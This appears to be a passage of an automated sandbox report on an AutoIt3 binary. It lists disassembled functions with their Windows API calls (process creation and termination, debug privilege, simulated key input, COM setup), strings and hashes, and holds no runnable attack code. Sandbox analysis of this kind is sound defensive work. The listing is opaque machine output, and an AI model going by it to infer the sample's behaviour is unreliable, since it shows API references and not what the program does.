                                      • Instruction ID: 0929d0aca78bda8187d9f610e24d29031f103f505a59f35b33a3b92daa730649
                                      • Opcode Fuzzy Hash: 9caba30c2372447a5514b9f6a09463a8c1247d7ccaa634fe471d7023974d7e9e
                                      • Instruction Fuzzy Hash: E8F12771A00219AFCB14DF94C884EAEB7B9FF45355F148058F95AEB254CB31EE45CB90
                                      Function 0087FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0087FD9E
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF31
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF55
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF95
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087FFB7
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00880133
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00880165
                                      • CloseHandle.KERNEL32(?), ref: 00880194
                                      • CloseHandle.KERNEL32(?), ref: 0088020B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: 2bfddf1ff78b4dd546defa5cb76757e612e84dacb96d1792dc275c06ae9aa7a8
                                      • Instruction ID: 710d868dea315e6aafc27c21cdee52cf35e628b844edb62be70a5fc1930daa9d
                                      • Opcode Fuzzy Hash: 2bfddf1ff78b4dd546defa5cb76757e612e84dacb96d1792dc275c06ae9aa7a8
                                      • Instruction Fuzzy Hash: AFE1AB312046019FCB54EF29C891A6ABBE1FF85314F18856DF999DB2A2CB31EC45CF52
                                      Function 0086527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863B8A,?), ref: 00864BE0
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863B8A,?), ref: 00864BF9
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008652FB
                                      • _wcscmp.LIBCMT ref: 00865315
                                      • MoveFileW.KERNEL32(?,?), ref: 00865330
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: d75b0848879d8bbc2630de896bb489a97eca6474fd4e16dd679b6455c2fd3b74
                                      • Instruction ID: f7b0a5d57b8e29ea148602e945ce2c29dc5d1b15e06d4eaa50b267f427110683
                                      • Opcode Fuzzy Hash: d75b0848879d8bbc2630de896bb489a97eca6474fd4e16dd679b6455c2fd3b74
                                      • Instruction Fuzzy Hash: 2D5174B20083855BC764EBA4D8919DFB7ECFF84340F500A1EB289C3152EF34A6888757
                                      Function 00888C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00888D24
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: ffa9edd9642303e7b7e0cd535adc5a4120cfbdddaf2795002d6f06be81b7e1f4
                                      • Instruction ID: 78ea725c19e31404b699d99bfa36778d7d39e4d0e3e84eebc2e5608e90bf127e
                                      • Opcode Fuzzy Hash: ffa9edd9642303e7b7e0cd535adc5a4120cfbdddaf2795002d6f06be81b7e1f4
                                      • Instruction Fuzzy Hash: B7519C30640208FFEBB4BF288C89B997B65FB15324FA44512FA15EB1E1CB71A990DB51
                                      Function 00802F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0083C638
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083C65A
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0083C672
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0083C690
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0083C6B1
                                      • DestroyIcon.USER32(00000000), ref: 0083C6C0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0083C6DD
                                      • DestroyIcon.USER32(?), ref: 0083C6EC
                                        • Part of subcall function 0088AAD4: DeleteObject.GDI32(00000000), ref: 0088AB0D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 1e59bfac93bc3e4c5f62360ac0191eb4ede73fe94f8b0aecbd5682e34adf3c81
                                      • Instruction ID: d6187c32b7aba3e7a33b2e57a88d73b20c434ab56a9325e4986241e5ccb5143b
                                      • Opcode Fuzzy Hash: 1e59bfac93bc3e4c5f62360ac0191eb4ede73fe94f8b0aecbd5682e34adf3c81
                                      • Instruction Fuzzy Hash: 7A51397060020AAFDB64DF24CC49FAA7BB5FB94750F104529F946E72D0EBB1A950DF90
                                      Function 0085A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0085B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085B54D
                                        • Part of subcall function 0085B52D: GetCurrentThreadId.KERNEL32 ref: 0085B554
                                        • Part of subcall function 0085B52D: AttachThreadInput.USER32(00000000,?,0085A23B,?,00000001), ref: 0085B55B
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A246
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0085A263
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0085A266
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A26F
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0085A28D
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0085A290
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A299
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0085A2B0
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0085A2B3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: 4ff738aae74bb03b4ceed2941815c30044c874f38f7499d8934719387c652ea4
                                      • Instruction ID: 885ea7c3bdc798982daa4555a89cef41895546d45791129635366f9c4046b380
                                      • Opcode Fuzzy Hash: 4ff738aae74bb03b4ceed2941815c30044c874f38f7499d8934719387c652ea4
                                      • Instruction Fuzzy Hash: 0111E1B1950218BEFA106FA49C8AF6A7B2DFB4C751F10041AF750AB0D1CAF35C509EA0
                                      Function 008594D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085915A,00000B00,?,?), ref: 008594E2
                                      • HeapAlloc.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 008594E9
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0085915A,00000B00,?,?), ref: 008594FE
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0085915A,00000B00,?,?), ref: 00859506
                                      • DuplicateHandle.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 00859509
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0085915A,00000B00,?,?), ref: 00859519
                                      • GetCurrentProcess.KERNEL32(0085915A,00000000,?,0085915A,00000B00,?,?), ref: 00859521
                                      • DuplicateHandle.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 00859524
                                      • CreateThread.KERNEL32(00000000,00000000,0085954A,00000000,00000000,00000000), ref: 0085953E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 242e52998f03cff5acf3e5639070366d65d2f92955c6c02e761c52fe47de0c9f
                                      • Instruction ID: c31f034bc4f5fa078728dd6894eeb306c8c0dc93869290bfedfd4f3edb47cbea
                                      • Opcode Fuzzy Hash: 242e52998f03cff5acf3e5639070366d65d2f92955c6c02e761c52fe47de0c9f
                                      • Instruction Fuzzy Hash: 9C01B6B5640308BFEB11ABA5DC4DF6B7BACFB89711F048412FA05DB2A1DA749804CF24
                                      Function 0087A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 941cf07e048e35c8096bdc5668ff1aa6a94799937bfe6a74e0b03eb30e0ce394
                                      • Instruction ID: 769051235eb4edfbfaabecc2866f536d06d5c8b43ad994662562b59f9c69746a
                                      • Opcode Fuzzy Hash: 941cf07e048e35c8096bdc5668ff1aa6a94799937bfe6a74e0b03eb30e0ce394
                                      • Instruction Fuzzy Hash: 7AC1B371A0021A9FDF18DF98C884AAEB7F5FB88314F14C469E919E7285E770DD44CB91
                                      Function 008797FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      • Opcode ID: 61ad05635038945273f84b837ce5190fed4247d898732d4dccde87baef98f2bd
                                      • Instruction ID: 9e275b5418534080243b6601c1f27a5dcfa889ed5b9272d811ba798661ff27b1
                                      • Opcode Fuzzy Hash: 61ad05635038945273f84b837ce5190fed4247d898732d4dccde87baef98f2bd
                                      • Instruction Fuzzy Hash: 2F918B71A00229AFDF20CFA5C844FAEBBB8FF45724F108559E659EB285D770D944CBA0
                                      Function 00879E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00857D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?,?,00858073), ref: 00857D45
                                        • Part of subcall function 00857D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D60
                                        • Part of subcall function 00857D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D6E
                                        • Part of subcall function 00857D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?), ref: 00857D7E
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00879EF0
                                      • _memset.LIBCMT ref: 00879EFD
                                      • _memset.LIBCMT ref: 0087A040
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0087A06C
                                      • CoTaskMemFree.OLE32(?), ref: 0087A077
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0087A0C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: 02c0214c1b4a5f822a38abd330a033516af1d6f3f35755bca0ebb98a6bcb3efb
                                      • Instruction ID: 3490bfe23f549889e24bf303afb530edfa59b308ae4b44b600559dea801e367c
                                      • Opcode Fuzzy Hash: 02c0214c1b4a5f822a38abd330a033516af1d6f3f35755bca0ebb98a6bcb3efb
                                      • Instruction Fuzzy Hash: 6F913571D00229EBDB10DFA4D844ADEBBB9FF08310F10812AF519E7291DB719A44CFA1
                                      Function 008873A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00887449
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 0088745D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00887477
                                      • _wcscat.LIBCMT ref: 008874D2
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 008874E9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00887517
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: f0e63b5278fad29a636eb27fd79aa1a1052bfed58f2c66659646a00aeb9d50ca
                                      • Instruction ID: 4373d6d016de037fa08bb52c746696af318f78953fdb2e902d5e9893663b28c0
                                      • Opcode Fuzzy Hash: f0e63b5278fad29a636eb27fd79aa1a1052bfed58f2c66659646a00aeb9d50ca
                                      • Instruction Fuzzy Hash: 01419F71A04348AFEB21AF64CC85BEA7BB8FF48354F10442AF984E7291D771DD849B50
                                      Function 0087F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00864148: CreateToolhelp32Snapshot.KERNEL32 ref: 0086416D
                                        • Part of subcall function 00864148: Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
                                        • Part of subcall function 00864148: CloseHandle.KERNEL32(00000000), ref: 00864245
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F08D
                                      • GetLastError.KERNEL32 ref: 0087F0A0
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F0CF
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0087F14C
                                      • GetLastError.KERNEL32(00000000), ref: 0087F157
                                      • CloseHandle.KERNEL32(00000000), ref: 0087F18C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: fac86a9a541986ccd13db05c5cfb949043b1c68fe8ba50c313f1ab0b61ace7ce
                                      • Instruction ID: b84eb3904284ebd159656f88c2209c1deebde510d63370c22b7fdcc58b750ab0
                                      • Opcode Fuzzy Hash: fac86a9a541986ccd13db05c5cfb949043b1c68fe8ba50c313f1ab0b61ace7ce
                                      • Instruction Fuzzy Hash: 62419871240201DFDB12EF29CC95B69B7A5FF80714F488019FA4A9B292CB74E804CB96
                                      Function 008156F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00850C5B
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • _memset.LIBCMT ref: 00815787
                                      • _wcscpy.LIBCMT ref: 008157DB
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008157EB
                                      • __swprintf.LIBCMT ref: 00850CD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                      • String ID: Line %d: $AutoIt -
                                      • API String ID: 230667853-4094128768
                                      • Opcode ID: bff3a7b25caaa9900d5525d1e2a51c2f6764fbcd815bdc5f99d94436c6f02a2d
                                      • Instruction ID: f7725ec46879c6ef909128913fe69f3dce4b988a86b5a3455e2a0e99af2e0034
                                      • Opcode Fuzzy Hash: bff3a7b25caaa9900d5525d1e2a51c2f6764fbcd815bdc5f99d94436c6f02a2d
                                      • Instruction Fuzzy Hash: 5641A171008304AAD721EB68DC8AEDF77ECFF84354F000A1AF595D21A1EB749688CB97
                                      Function 008634DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 0086357C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: f6768eef91994c39761227a75decab587714cd7b1f4106e51714b6fd9b09d45f
                                      • Instruction ID: 0670c5d3226b9cd9a686bdab0c5de67071ffe97536980963c7d26de561a12307
                                      • Opcode Fuzzy Hash: f6768eef91994c39761227a75decab587714cd7b1f4106e51714b6fd9b09d45f
                                      • Instruction Fuzzy Hash: 3B113A31608366BEE7005A18EC96CAA779CFF05364B20002BFA11E7381E7B86F4046A1
                                      Function 008647E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00864802
                                      • LoadStringW.USER32(00000000), ref: 00864809
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086481F
                                      • LoadStringW.USER32(00000000), ref: 00864826
                                      • _wprintf.LIBCMT ref: 0086484C
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0086486A
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00864847
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: b8f755f46a6c0561791d62caab4edebb2528f057d2bea8ecc3754690f4845504
                                      • Instruction ID: 0d9a6a6c285568f9a18f0171c8dada9554df6d1f936bfc01c24e6b17ca0839dd
                                      • Opcode Fuzzy Hash: b8f755f46a6c0561791d62caab4edebb2528f057d2bea8ecc3754690f4845504
                                      • Instruction Fuzzy Hash: 780162F69003087FE751A7A49D89EFA776CFB48300F4405A6BB49E2141EB749E844F75
                                      Function 0088DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetSystemMetrics.USER32(0000000F), ref: 0088DB42
